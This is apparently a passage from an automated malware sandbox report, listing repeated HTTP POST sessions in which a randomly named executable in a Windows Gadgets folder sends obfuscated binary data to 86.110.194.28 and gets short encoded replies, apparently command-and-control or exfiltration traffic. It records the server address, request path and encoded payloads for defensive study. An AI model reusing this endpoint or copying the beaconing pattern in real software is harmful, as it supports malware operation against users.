                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:19.801594973 CET | 2568 | OUT
Jan 3, 2025 09:07:20.151932001 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:20.285936117 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:20 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:21.065151930 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:21.410518885 CET | 2052 | OUT
Jan 3, 2025 09:07:21.763943911 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:21.892483950 CET | 324 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:21 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:21.503123999 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:21.848068953 CET | 2576 | OUT
Jan 3, 2025 09:07:22.209737062 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:22.341129065 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:22 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:26.900568962 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.254323006 CET | 2052 | OUT | Data Raw: 5b 50 5e 5f 58 5b 50 5c 54 5b 59 5a 5b 51 57 58 5f 55 5a 5d 52 53 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P^_X[P\T[YZ[QWX_UZ]RSPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(#*8U$?/(;3',) $:4+<%:80?#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:27.601090908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.733854055 CET | 324 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:27 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 5d 26 3b 29 01 3d 2f 3f 1d 31 0d 08 01 35 0e 28 5c 2c 1e 08 40 21 2c 04 01 27 2b 28 13 3f 3e 35 1a 2b 33 03 51 20 58 22 0b 3f 1a 28 5d 03 10 39 13 28 3e 3f 10 3e 00 35 16 39 34 33 14 27 0e 23 02 29 0a 25 13 32 3c 08 1e 36 5b 2f 1f 3e 1d 2d 5b 33 02 3f 07 3f 0e 3f 5e 27 3d 20 54 0b 17 27 56 27 30 3c 03 27 28 0b 12 3d 0e 2b 02 24 3a 3e 0b 21 3f 2e 19 20 07 38 17 2f 0e 35 1c 30 38 0f 1c 29 2d 3f 57 26 3a 31 00 27 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $]&;)=/?15(\,@!,'+(?>5+3Q X"?(]9(>?>5943'#)%2<6[/>-[3???^'= T'V'0<'(=+$:>!?. 8/508)-?W&:1'.\#(U4WP
                                                                                                                                                                  Jan 3, 2025 09:07:27.764513016 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.981473923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.981695890 CET | 2576 | OUT | Data Raw: 5b 50 5b 5b 5d 5c 50 5a 54 5b 59 5a 5b 55 57 53 5f 55 5a 58 52 57 50 41 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[[]\PZT[YZ[UWS_UZXRWPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(."5$<)*Y042:5:4; [%)C'/<U?#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:07:28.203341961 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:27 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  7 | 192.168.2.4 | 49746 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:28.718630075 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:29.066829920 CET | 2576 | OUT | Data Raw: 5b 52 5e 50 5d 5c 50 50 54 5b 59 5a 5b 53 57 5d 5f 5d 5a 55 52 52 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^P]\PPT[YZ[SW]_]ZURRP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+.]#:,R%>6_3',65$!W ^/0$0?$?9#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:29.392749071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:29.522155046 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:29 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  8 | 192.168.2.4 | 49748 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:31.761706114 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:32.113632917 CET | 2576 | OUT | Data Raw: 5b 57 5b 5c 58 59 50 58 54 5b 59 5a 5b 52 57 58 5f 53 5a 55 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W[\XYPXT[YZ[RWX_SZUR]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>%6:<1<D);6'7!\&!) ?$:#&/<)#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:32.486134052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:32.619014978 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:32 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  9 | 192.168.2.4 | 49750 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:32.743386984 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:33.097990036 CET | 2576 | OUT | Data Raw: 5e 55 5b 5c 58 5c 55 5c 54 5b 59 5a 5b 51 57 5e 5f 55 5a 5e 52 55 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U[\X\U\T[YZ[QW^_UZ^RUP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+=[#:0U2?'*;>$B5%5V"%Q78'3:'0<3+#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:33.442147970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:33.571764946 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:33 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  10 | 192.168.2.4 | 49751 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:32.747220039 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:33.098078966 CET | 2052 | OUT | Data Raw: 5b 54 5e 5e 5d 5e 50 5a 54 5b 59 5a 5b 50 57 58 5f 57 5a 5d 52 55 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^^]^PZT[YZ[PWX_WZ]RUPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<1!$T&B=%$%2,)Q!"7(]$)3/3?#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:33.429280996 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:33.558135033 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:33 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 59 31 05 2a 13 29 2c 3f 5f 32 20 2d 58 35 30 2b 04 2f 0e 2d 18 23 3c 3d 5f 26 15 33 0d 2b 04 2d 1a 28 1d 2a 08 23 3e 03 10 2b 0a 28 5d 03 10 39 5c 3c 03 01 5a 3e 10 35 15 39 24 3f 14 24 24 2b 05 3e 33 31 56 25 05 25 0c 21 04 2c 0d 3d 0a 3e 02 30 02 38 19 3c 0e 23 5f 24 3d 20 54 0b 17 27 1d 24 0e 27 5b 31 01 25 58 2a 19 15 00 33 04 29 19 22 5a 2d 09 37 3a 34 18 2c 20 0b 56 24 38 00 0d 29 10 3c 0a 26 29 36 1e 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $Y1*),?_2 -X50+/-#<=_&3+-(*#>+(]9\<Z>59$?$$+>31V%%!,=>08<#_$= T'$'[1%X*3)"Z-7:4, V$8)<&)6&;.\#(U4WP


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  11 | 192.168.2.4 | 49752 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:33.739917994 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:34.098109007 CET | 2568 | OUT | Data Raw: 5b 54 5e 5e 58 5a 50 5f 54 5b 59 5a 5b 57 57 5d 5f 56 5a 5f 52 5c 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^^XZP_T[YZ[WW]_VZ_R\P@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@).=\5018>%'4.&"':4;4]'9 D'<$+#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:34.451946020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:34.586316109 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:34 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  12192.168.2.44975386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:34.717034101 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:07:35.066730976 CET | 2576 | OUT
Jan 3, 2025 09:07:35.427675009 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:35.566337109 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:35.760931969 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:07:36.116731882 CET | 2576 | OUT
Jan 3, 2025 09:07:36.481214046 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:36.619604111 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:36.805354118 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:07:37.160736084 CET | 2576 | OUT
Jan 3, 2025 09:07:37.511320114 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:37.642385960 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49756 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:37.812547922 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2568
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:07:38.160489082 CET | 2568 | OUT
Jan 3, 2025 09:07:38.490452051 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49757 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:38.573647022 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2060
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:07:38.928361893 CET | 2060 | OUT
Jan 3, 2025 09:07:39.278163910 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:39.414228916 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Jan 3, 2025 09:07:39.428487062 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Jan 3, 2025 09:07:39.646315098 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:39.646555901 CET | 2576 | OUT
Jan 3, 2025 09:07:39.868927002 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


